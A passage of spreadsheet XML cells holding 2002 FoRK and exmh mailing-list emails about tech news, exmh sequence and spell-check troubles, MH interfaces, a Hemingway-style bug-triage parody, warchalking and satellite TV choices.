https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">What a fantastically bizarre device:
   http://www.conferencebike.com/Anyone seen one in the flesh?-- 
Andy Armstrong, http://www.tagish.co.uk/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This comment probably goes into better late than never but:
I wonder if their decision to open source their code had
anything to do with it.I've read through their asset sheet, but it doesn't say anything
about their real assets--their customers.  Anyone know if they
have any left?GregJim Whitehead wrote:&gt; Via Dave's Scripting News:
&gt; 
&gt; http://www.theregister.co.uk/content/23/25245.html
&gt; 
&gt; RealNames Corp., the VC-funded wheeze that promised to short-circuit the DNS
&gt; system by doing an exclusive deal with Microsoft, has announced that it will
&gt; cease trading as of today.
&gt; 
&gt; RealNames' proposition was simple, and on the face of it, a no-brainer. Type
&gt; a real word or phrase into your browser and it would guide you to your
&gt; destination, bypassing all this cumbersome domain name business. A nice
&gt; idea, but one based on the assumption that people are fairly stupid, and
&gt; couldn't figure out that Comp USA's website might be say, CompUSA.com, and
&gt; that even if you mistook whitehouse.gov for whitehouse.org, you'd be unhappy
&gt; about the serendipitous diversion.
&gt; 
&gt; *snip*
&gt; 
&gt; Microsoft cancelled its contract with RealNames earlier this year, and as a
&gt; consequence - the company has no "Plan B" - it's now toast.
&gt; 
&gt; - Jim
&gt; 
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; 
&gt; 
-- 
Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Um, you've confused RealAudio and RealNames. Bad bits.
LuisOn Wed, 2002-07-31 at 18:28, Gregory Alan Bolcer wrote:
&gt; This comment probably goes into better late than never but:
&gt; I wonder if their decision to open source their code had
&gt; anything to do with it.
&gt; 
&gt; I've read through their asset sheet, but it doesn't say anything
&gt; about their real assets--their customers.  Anyone know if they
&gt; have any left?
&gt; 
&gt; Greg
&gt; 
&gt; Jim Whitehead wrote:
&gt; 
&gt; &gt; Via Dave's Scripting News:
&gt; &gt; 
&gt; &gt; http://www.theregister.co.uk/content/23/25245.html
&gt; &gt; 
&gt; &gt; RealNames Corp., the VC-funded wheeze that promised to short-circuit the DNS
&gt; &gt; system by doing an exclusive deal with Microsoft, has announced that it will
&gt; &gt; cease trading as of today.
&gt; &gt; 
&gt; &gt; RealNames' proposition was simple, and on the face of it, a no-brainer. Type
&gt; &gt; a real word or phrase into your browser and it would guide you to your
&gt; &gt; destination, bypassing all this cumbersome domain name business. A nice
&gt; &gt; idea, but one based on the assumption that people are fairly stupid, and
&gt; &gt; couldn't figure out that Comp USA's website might be say, CompUSA.com, and
&gt; &gt; that even if you mistook whitehouse.gov for whitehouse.org, you'd be unhappy
&gt; &gt; about the serendipitous diversion.
&gt; &gt; 
&gt; &gt; *snip*
&gt; &gt; 
&gt; &gt; Microsoft cancelled its contract with RealNames earlier this year, and as a
&gt; &gt; consequence - the company has no "Plan B" - it's now toast.
&gt; &gt; 
&gt; &gt; - Jim
&gt; &gt; 
&gt; &gt; 
&gt; &gt; 
&gt; &gt; http://xent.com/mailman/listinfo/fork
&gt; &gt; 
&gt; &gt; 
&gt; 
&gt; 
&gt; -- 
&gt; Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
&gt; Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Yet another pre-interview query.   I don't know a thing about them that 
isn't on their mostly-uninformative web site.   Charles River Ventures led 
a $10 million round of financing in January of this year.One of their techie founders wrote a paper on a protocol to allow 
out-of-order image chunk delivery for image types that can be rendered 
that way.   Eirikurhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting project involving geospatial data for mostly governmental uses.
They have a deep understanding of geospatial data needs for several
government agencies. The project infrastructure is centralized, and has been
used in the field on several projects.http://dg.statlab.iastate.edu/dg/research/- Jimhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Last week I had a chance to see some TabletPC's demonstrated, and I was very
impressed.*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model)I believe the TabletPC will be very successful, and is a much bigger deal
than the relative lack of press coverage would suggest. I'm definitely
starting to think about how I could incorporate one into my routine...- Jim
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh yeah, the link for more info:http://www.microsoft.com/windowsxp/tabletpc/default.asp- Jim
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Fri, 26 Jul 2002 10:06:41 EDT,
	pll@lanminds.com wrote:&gt; [...]Unless someone writes a really neat curses based 
&gt; interface to ride on top of nmh :)Years ago, there was a package called mh-e which was an emacs interface
to MH.  I don't know if it's still around or works.  But it's an idea._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">There was also an interface called plum, but I was never able to get it 
to work on the platform I was using in those days (SGI).  Since plum 
was written for perl4, it would probably need a major overhaul to work 
well with modern Perl.  It's pretty ugly code, too, being written by 
Tom Christiansen. :-)	-jan-
-- 
Jan L. Peterson_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 05 Aug 2002 21:39:59 -0400 
Tom Reingold  wrote:&gt; Years ago, there was a package called mh-e which was an emacs
&gt; interface to MH.  I don't know if it's still around or works.  But
&gt; it's an idea.Its still around, its actively maintained, and its quite well evolved.--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</si>
  <si>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
Hi,I am experiencing a strange problem since a couple of days now,
I have several folders with unseen sequences, and when there is
new mail they are highlighted. This works fine.But .. since a couple of days the actual inbox won't be highlighted
any more when there is new mail. On the other hand the unseen window
still indicates if there is new mail in the inbox.All other folders seem to work properly.Any hints ?  Marc Baaden--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</si>
  <si>
    <t xml:space="preserve">I was doing a search on some research papers on computer science and
ran across one of the most useful examples of public vertical search portals.
http://hpsearch.uni-trier.de/hp/It's the home pages of 62,179 computer scientists.
Mostly broken, but 50/50 on better title hits than DBLP.One thing that's interesting is that for Google's
"Similar Pages", only one homepage which returns the FoRK Archive is
the page below[1] Is he on FoRK.  Other similar pages
include printer toner, home mortgages, and one for the origins of the
prime radiant[2] which I found out is an Asmiov concept.The concept of a prime radiant is that there
is a single interconnected FoRKlist that ties a large number of
decentralized individuals throughout the world who's collective
wisdom is a good model for predicint the future.
Greg[1] http://www.eecs.umich.edu/~jfm/roberto.html
[2] http://www.prime-radiant.com/primeorigins.htmlGreg-- 
Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. FoRK wrote:
&gt; Don't know if everybody knows this trick...Yes. They do.&gt; &gt; Because we're inherently lazy, this works for windows only, Huh? Oh, that's right, Unix picked up the idea of /etc/hosts
from Windows. I keep forgetting. &gt; &gt; don't use it on a mac!Especially macs running unix (see above).&gt; &gt; We didn't write this file and do not provide
 &gt; &gt; support for it's use.We don't even know how to use the fucking English language.
-- 
What security level comes after "Totally Apeshit"?
     -- http://www.mnftiu.cc/mnftiu.cc/war12.html
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">FYI, members of this list might be interested in the 4th International
Workshop on Web Site Evolution (WSE 2002), being held October 2, 2002, in
Montreal, Canada.http://star.itc.it/wse2002/- Jim&gt;&gt;From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Web-based services from dynamic composible resources, extending both the
range and scope of services that can be made available through the Web.The goal of this one-day workshop is to bring together members of the Web
design, software engineering, and information technology communities to
discuss techniques for migrating to Web services. Architectural styles and
tool support for service-based Web sites are currently quite diverse.
Expertise in constructing service-based Web pages is quite limited, and
experience accounts are lacking. The explosion of non-traditional computing
platforms for browsing the Web, such as PDAs, WAP-enabled phones, and
Internet appliances, is forcing Web professionals to rethink the separation
of form from content and the range and scope of services offered via the
Web.WSE 2002 will provide an opportunity for the exchange of information related
to exciting new research and empirical results in areas including (but not
limited to):*   Migrating to Web services
*   Web quality determination and improvement through process and product
control
*   Enhancing Web sites to make them more accessible, reliable, and usable
*   Analyzing and reverse-engineering Web site content and structure
*   Making Web site content available in multiple formats for multiple
platforms
*   Applying traditional software engineering activities such as
architecture, metrics, and testing to Web sites
*   Case studies of large-scale Web site reuse, reengineering, and evolutionWSE 2002 is co-located with the IEEE International Conference on Software
Maintenance (ICSM 2002). ICSM is the IEEE Computer Society's flagship event
focused on the modernization of existing systems. ICSM 2002's theme of
"maintaining distributed heterogeneous systems" nicely compliments WSE
2002's overall theme and goals.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Joel Warren wrote:
&gt; 
&gt;    Part 1.1    Type: Plain Text (text/plain)
&gt;            Encoding: quoted-printable
&gt; Hey Greg!  My name is joel Warren and I need to cancel earthlink. Your message was posted awhile ago so I am not sure if you can still refer me to someone or a # that i can call about cancelling. I would appreciate it!  Thanks! Joel
Hey Joel,
  Your message wasn't clear if you are cancelling a
regular earthlink account or the Omnisky inherited one. 
I'm sure if you call their customer service number
they can unsubscribe you.   I took me 4 tries,
so make sure you get a confirmation number.  They'll
try and not give you one and ignore your call just
to make it really inconvenient.  http://support.earthlink.net/support/CONTACT/phone.jspOut of interest, what search engine and term did you
do to find that article? Greg
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; I'm sure if you call their customer service 
&gt; number they can unsubscribe you.   I took me 4 
&gt; tries, took me 5.&gt; so make sure you get a confirmation number.  Does that help? I had 5 of those. Lovely company...Max
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 09:24 PM 8/3/02 -0700, Mr. FoRK wrote:&gt;Don't know if everybody knows this trick...
&gt;
&gt;Puts 127.0.0.1 as the IP for adservers. Elegant.You should note that this trick has been out-evolved by [some] websites. 
These sites (e.g, yahoo) require a cookie that is set by the pop-up ad to 
be present before your browsing can continue...Udhay-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
      God is silent. Now if we can only get Man to shut up.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Obviously you need a server at 127.0.0.1 that serves well known cookies...The arms race continues.sdwUdhay Shankar N wrote:&gt; At 09:24 PM 8/3/02 -0700, Mr. FoRK wrote:
&gt;
&gt;&gt; Don't know if everybody knows this trick...
&gt;&gt;
&gt;&gt; Puts 127.0.0.1 as the IP for adservers. Elegant.
&gt;
&gt;
&gt; You should note that this trick has been out-evolved by [some] 
&gt; websites. These sites (e.g, yahoo) require a cookie that is set by the 
&gt; pop-up ad to be present before your browsing can continue...
&gt;
&gt; Udhay
&gt;
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 5 Aug 2002, Stephen D. Williams wrote:&gt; Obviously you need a server at 127.0.0.1 that serves well known cookies...Well known *one-time* cookies?
&gt; The arms race continues.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm positive some of you folks have done this, so perhaps someone can just
drop me a pointer to where it's already been discussed?In particular, I was going to have a menu entry available for:o  remove the SA markup from a message
o  add/remove addresses to whitelistHelp!  :-)  I've never done customization of this type to my exmh install.
I'm running version 2.4 (6/23/2000) on RedHat 7.3--Harlan_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Tue, 06 Aug 2002 09:04:58 +0100
    From:        Marc Baaden 
    Message-ID:    | Any hints ?Probably a private sequence has gotten set, the highlighting only
works for public ones.If "scan unseen" works as you'd expect, but highlighting doesn't,
that's the usual explanation.kre_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi,sorry, but I am not very familiar with this sequence business and
couldn't find an answer to my problem in the documentation.In fact, to be precise, it seems only to be the highlighting in
the folder cache part and only for the inbox which does not work.Is there anything I could/should check ? Any file, .. ?Thanks,
Marc&gt;&gt;&gt; Robert Elz said:
 &gt;&gt;     Date:        Tue, 06 Aug 2002 09:04:58 +0100
 &gt;&gt;     From:        Marc Baaden 
 &gt;&gt;     Message-ID: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</si>
  <si>
    <t xml:space="preserve">
Harlan Feinstein said:&gt; In particular, I was going to have a menu entry available for:
&gt; o  remove the SA markup from a message
&gt; o  add/remove addresses to whitelist
&gt; Help!  :-)  I've never done customization of this type to my exmh install.
&gt; I'm running version 2.4 (6/23/2000) on RedHat 7.3Despite being the author of SpamAssassin, I've never fixed exmh to do
this.  I am therefore clearly not an exmh hacker ;)But to simplify -- the first action is piping the message to an external
command, then replacing the message file with the output; and the second
is simply piping the message to another command, then ignoring the output.
I'd say it's easy enough to do, if someone can provide the tcl.--j._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">J C Lawrence  writes:
&gt; Tom Reingold  wrote:
&gt;&gt; Years ago, there was a package called mh-e which was an emacs
&gt;&gt; interface to MH.  I don't know if it's still around or works.  But
&gt;&gt; it's an idea.&gt; Its still around, its actively maintained, and its quite well evolved.I useta use mh-e regularly, but I never figured out whether it could
handle exmh's multidrop mechanism, which is something I've grown to
rely on.  Does that work in recent mh-e versions?  I'd love to use
mh-e when reading mail remotely, if it can handle my multiple-inbox-
folders setup...			regards, tom lane_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 07 Aug 2002 01:38:55 -0400 
Tom Lane  wrote:&gt; I useta use mh-e regularly, but I never figured out whether it could
&gt; handle exmh's multidrop mechanism, which is something I've grown to
&gt; rely on.  Does that work in recent mh-e versions?  I'd love to use
&gt; mh-e when reading mail remotely, if it can handle my multiple-inbox-
&gt; folders setup...I've no idea.  Have you tried asking on the MH-E lists?-- 
J C Lawrence                
---------(*)                Satan, oscillate my metallic sonatas. 
claw@kanga.nu               He lived as a devil, eh?		  
http://www.kanga.nu/~claw/  Evil is a name of a foeman, as I live._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not up to forking the text, but for your entertainment:http://www.kanga.nu/~claw/bug_count.html
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Rodent of Unusual Size wrote:
&gt; I'm not up to forking the text, but for your entertainment:
&gt; 
&gt; http://www.kanga.nu/~claw/bug_count.htmlFine, *I'll* fork it. This piece has been up on the wall of our
CTO's office for years. It deserves to be forked, or even reforked.- Joe(BTW, RAID is the home-grown bug tracking system used at Microsoft.
See e.g. http://www.stsc.hill.af.mil/CrossTalk/1995/oct/Shippin.asp.
It was a fine tool, better than any other I've had to use...)The Bug Count Also Rises
by John Browne
(Imitation Hemingway Contest Winner)In the fall of that year the rains fell as usual and washed the leaves 
of the dust and dripped from the leaves onto the ground. The shuttles 
drove through the rainy streets and took the people to meetings, then 
later brought them back, their tires spraying the mist into the air.Many days he stood for a long time and watched the rain and the shuttles 
and drank his double-tall mochas. With the mochas he was strong.Hernando who worked down the hall and who was large with microbrews came 
to him and told him that the ship day was upon them but the bugs were 
not yet out. The bugs which were always there even when you were in 
Cafes late at night sipping a Redhook or a double-tall mocha and you 
thought you were safe but they were there and although Enrico kept the 
floor swept clean and the mochas were hot the bugs were there and they 
ate at you.When Hernando told him this he asked how many bugs. "The RAID is huge 
with bugs," Hernando said. "The bugs are infinite.""Why do you ask me? You know I cannot do this thing anymore with the bugs.""Once you were great with the bugs," Hernando said. "No one was 
greater," he said again. "Even Prado.""Prado? What of Prado? Let Prado fix the bugs."Hernando shrugged. "Prado is finished. He was gored by three Sev 2's in 
Chicago. All he does now is drink herb tea and play with his screensavers.""Herb tea?""It is true, my friend." Hernando shrugged again. Later he went to his 
office and sat in the dark for a long time. Then he sent e-mail to Michaels.Michaels came to him while he was sipping a mocha. They sat silently for 
awhile, then he asked Michaels, "I need you to triage for me."Michaels looked down. "I don't do that anymore," he said."This is different. The bugs are enormous. There are an infinity of bugs.""I'm finished with that," Michaels said again. "I just want to live 
quietly.""Have you heard Prado is finished? He was badly gored. Now he can only 
drink herb tea.""Herb tea?" Michaels said."It is true," he said sorrowfully.Michaels stood up. "Then I will do it, my friend," he said formally. "I 
will do it for Prado, who was once great with the bugs. I will do it for 
the time we filled Prado's office with bouncy balls, and for the time 
Prado wore his nerf weapons in the marketing hall and slew all of them 
with no fear and only a great joy at the combat. I will do it for all 
the pizza we ate and the bottles of Coke we drank."Together they walked slowly back, knowing it would be good. As they 
walked the rain dripped softly from the leaves, and the shuttles carried 
the bodies back from the meetings.-- 
The Combatant State is your father and your mother, your only
protector, the totality of your interests. No discipline can
be stern enough for the man who denies that by word or deed.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Joseph S Barrera,  writes:    J&gt; Fine, *I'll* fork it. This piece has been up on the wall of our
    J&gt; CTO's office for years. It deserves to be forked, or even
    J&gt; reforked.Any idea of the date of this "Hemingway Contest" claim?  Apparently
RAID places it c.1995 but I'm just curious as to how many years this
may have been out there.
-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
&gt; Any idea of the date of this "Hemingway Contest" claim?  Apparently
&gt; RAID places it c.1995 but I'm just curious as to how many years this
&gt; may have been out there.If memory serves, RAID was in use when I joined Microsoft
in 1992 and was still in use when I left in 1999.- Joe
-- 
The Combatant State is your father and your mother, your only
protector, the totality of your interests. No discipline can
be stern enough for the man who denies that by word or deed.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>Hi,my exmh-2.5 suddenly will not spell-check anymore. If I click More..., Spell...
a window opens and is gone just as fast.I don't recall having tinkered with anything.How can I get spell-checking back?If you explain please do it so a standard PC user will understand.Thanks in advance!-- 
Peter
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>On Friday 16 August 2002 08:24 pm, Peter wrote:
&gt; Hi,
&gt;
&gt; my exmh-2.5 suddenly will not spell-check anymore. If I click
&gt; More..., Spell... a window opens and is gone just as fast.
&gt;
&gt; I don't recall having tinkered with anything.
&gt;
&gt; How can I get spell-checking back?It may be a conspiracy against spell checkers. I noticed the Spell icon 
was dimmed in Netscape Communicator 4.79 about a month ago. It worked 
for years prior.-- 
David Kelly N4HHE, dkelly@hiwaay.net
=====================================================================
The human mind ordinarily operates at only ten percent of its
capacity -- the rest is overhead for the operating system._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>Exmh keeps turning the folder indicator blue for one folder, and I've read all the messages in the folder.  Driving me nuts.  I've packed the folder, I've deleted the .mh_sequences file there, keeps doing it.  Help!  I've just recently started using 2.4 (was using 2.2), so perhaps there are things that needed to be deleted/changed in my settings?--Harlan_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t xml:space="preserve">
Harlan Feinstein wrote:
&gt; Exmh keeps turning the folder indicator blue for one folder, and
&gt; I've read all the messages in the folder.  Driving me nuts.  I've
&gt; packed the folder, I've deleted the .mh_sequences file there,
&gt; keeps doing it.  Help!  
&gt; I would rescan then do 'First Unseen', and see what happens .._______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>Hobos in the depression used to use this technique to
know if they could find a meal or a bed and how
friendly the residents were to begging.  This showed
up on sladhdot in June.  It'll be interesting to see
what the parallel sign is for the Hobo sign
that representing a meal or bed if threatened. Can
you imagine threatening someone to get your wireless? Another phenomenon is Internet connection sharing which is
freely available on most modern OSs.  It's a very easy way to
share a $6/24hour period wireless conneciton in the San Jose
airport among dozens of your favorite friends.  http://news.bbc.co.uk/1/hi/technology/2197252.stm
http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf
  Friday, 16 August, 2002, 11:42 GMT 12:42 UK 
  FBI warns about wireless craze
  Some FBI agents are worried about warchalking  Well-meaning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 computers to search for all phone lines
  that returned data tones. The exhaustive searching was known as "wardialling".
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
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racking.http://opentopic.groundspeak.com/0/OpenTopic?a=tpc&amp;s=1750973553&amp;f=6770936793&amp;m=6220923794
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "G" == Gregory Alan Bolcer  writes:    G&gt; ... Can you imagine threatening someone to get your wireless?Well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Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
large (&gt;100 msgs) unseen sequences. Anybody else having this problem?/A_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on 
&gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem?
&gt; 
&gt; I'll take the blame.
&gt; 
&gt; The reason, I suspect, is that we're needlessly reading the .sequences file 
&gt; multiple times because of other sequences.  I need to make the code much 
&gt; smarter about handling that file, but first I have a few other fish to fry in 
&gt; my rather large patch that's on it's way.
&gt; No panic,I'm all for cleaning things up before getting it optimized.A_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Tue, 20 Aug 2002 22:51:52 -0400
    From:        Valdis.Kletnieks@vt.edu
    Message-ID:  &lt;200208210251.g7L2pqKb001805@turing-police.cc.vt.edu&gt;  | Ever tried to get MH to *not* have a 'pseq' sequence?Hmm - I've been using MH for a long time (since well before there were
sequences) and I don't think I've ever seen a "pseq" ...I'm guessing that that's the sequence that you have "pick" create
As I recall it, it has no default sequence name, so the sequence names
that people use will tend to vary from person to person won't they
(except as MH configurations move around institutions by osmosis).I've always used "sel" for that purpose.I kind of doubt that any pre built-in sequence name is going to be
very general.   Even "unseen" can be changed (fortunately that one
is easy to find in the MH profile - though whether exmh does that,
os just uses "unseen" I haven't bothered to find out).kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
I paid for CuteFTP on my Windows box.  Well worth the money despite there 
being free alternatives, no regrets whatsoever.Now that Mozilla isn't taking X down twice a day I'm unlikely to pay for 
Opera, but if that hadn't happened around the same time I made the switch 
to 100% unix I would have been happy to.- Lucas
http://xent.com/mailman/listinfo/fork</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</si>
  <si>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age.http://www.kuai.se/~itart/
http://www.kuai.se/~itart/html/gallery1.htm
http://www.kuai.se/~itart/bildhtml/4.htmMy guess is she'd gladly make fossils of any object you wanted, for a price.
Could be an interesting memorial of your next product launch!- Jimhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, Tom wrote:&gt; So are PNGs still kosh?So far, but it's not even noon yet. Stealth patents are definately gaining
in popularity, maybe we can get this included in the new death penalty for
hackers law.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, Adam L. Beberg wrote:&gt; So far, but it's not even noon yet. Stealth patents are definately
&gt; gaining in popularity, maybe we can get this included in the new death
&gt; penalty for hackers law.Just ignore the laws completely. You cannot win the legal way, because the
geek is a minority, and even not a lobby-toting minority at that. You
Cannot Win That Way. Really.We need an uncensorable, hardened P2P infrastructure to distribute such
staples as open source software.  Software patents are tragedy of the
commons all over again. The collateral damage done by pirating is a
complete footnote in comparison to the radioactive glass iron-fisted IP
rights enforcement habitually produces.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
So whats the eariliest  for hitting 7k?http://money.cnn.com/2002/07/19/markets/markets_newyork/index.htm"According to preliminary reports, the Dow fell 390.23 to 8,019.26, to its
lowest level since January 1998. The Nasdaq composite index lost 37.94 to
1,319.01. The Standard &amp; Poor's 500 index lost 34.03 to 847.53.The index has fallen more than 1,000 points in the past two weeks and
closed down nine of the last 10 sessions. Both the Nasdaq and S&amp;P are near
their lowest levels since the first half of 1997.
"http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I told AT&amp;T to get lost after they wanted $$$ to change my service address.RCN doesn't service Mountain View, so I'm looking at Dish Network and 
Direct TV.So far Direct TV appears to be the better deal.Recommendations? Horror stories? Alternatives I've missed?-- whumphttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Wayne E Baisley wrote:
&gt; There's nothing you can know that isn't known.
&gt; Nothing you can see that isn't shown.
&gt; Nowhere you can be that isn't where you're meant to be.
&gt; It's easy.
&gt; All you need is HTML.Are you quoting the Beatles version or the Laibach version?- Joe :-)
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">There's nothing you can know that isn't known.
Nothing you can see that isn't shown.
Nowhere you can be that isn't where you're meant to be.
It's easy.
All you need is HTML.By way of proof, there are no jpgs, gifs, pngs, etc here...
http://www.anagrammy.com/anagflag.htmlCheers,
WayneYeah yeah yeahhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Someone says,&gt; &gt; Wow. I'm so tempted to mail this guy several lbs of dog poop. I wonder
&gt; &gt; what the shipping costs would be to Delaware?
&gt;
&gt; Shipping costs?  This sort of thing
&gt; sounds perfect for decentralization --
&gt; like flower delivery, freshness counts,
&gt; and it's probably difficult to scale a
&gt; single dog's output arbitrarily.  Find
&gt; a dog owner in Delaware with a target
&gt; in Scruz, and swap deliveries.  P2p?
&gt;
&gt; &gt; I learned when RHAT's support team was mailed some poo that it's really
&gt; &gt; really illegal to do it.http://www.mailpoop.com has apparently been providing this service for a
while now,
along with http://www.smellypoop.com/order.html and
http://www.dogdoo.com/Default.asp.Jeff;http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">It doesn't really matter since they're about to merge. If you're into
PVRs though, Dish just came out with the "721"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merger.(oh and the 721 is based on Linux if that matters)Bill Humphries wrote:
&gt; 
&gt; I told AT&amp;T to get lost after they wanted $$$ to change my service address.
&gt; 
&gt; RCN doesn't service Mountain View, so I'm looking at Dish Network and
&gt; Direct TV.
&gt; 
&gt; So far Direct TV appears to be the better deal.
&gt; 
&gt; Recommendations? Horror stories? Alternatives I've missed?
&gt; 
&gt; -- whump
&gt; 
&gt; http://xent.com/mailman/listinfo/fork-- 
Brian Atkins
Singularity Institute for Artificial Intelligence
http://www.singinst.org/
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Special Bonus with your order, you will receive
&gt; 10 Original 1980 Topps Star Wars/Empire Strikes
&gt; Back Collector Cards Absultely Free!
&gt; These are Original 1980 Topps Star Wars/Empire
&gt; Strikes Back Collector Cards from 22 years ago! Not reprints!I have a complete Blue and Red set (series 1 &amp; 2 from 1977), and many cards
from  series 3-5. Guess they're not worth too much. This site lists them at
$45-$60 per set.I do have a C-3PIO enhanced with penis card:http://pages.map.com/starwars/faq.html#penis
- Jimhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Did someone invert the spam filters? I'm getting almost nothing but spam on
fork now...- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Are you quoting the Beatles version or the Laibach version?:-)Actually it's from Missing Mole's My Lubavitcher Mama featuring Milton 
Berners-Sinatra.  The version that was recorded in GIF-sur-Yvette, Fr.Cheers,
WayneOur work is semantic, our language protocol.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam L. Beberg wrote:
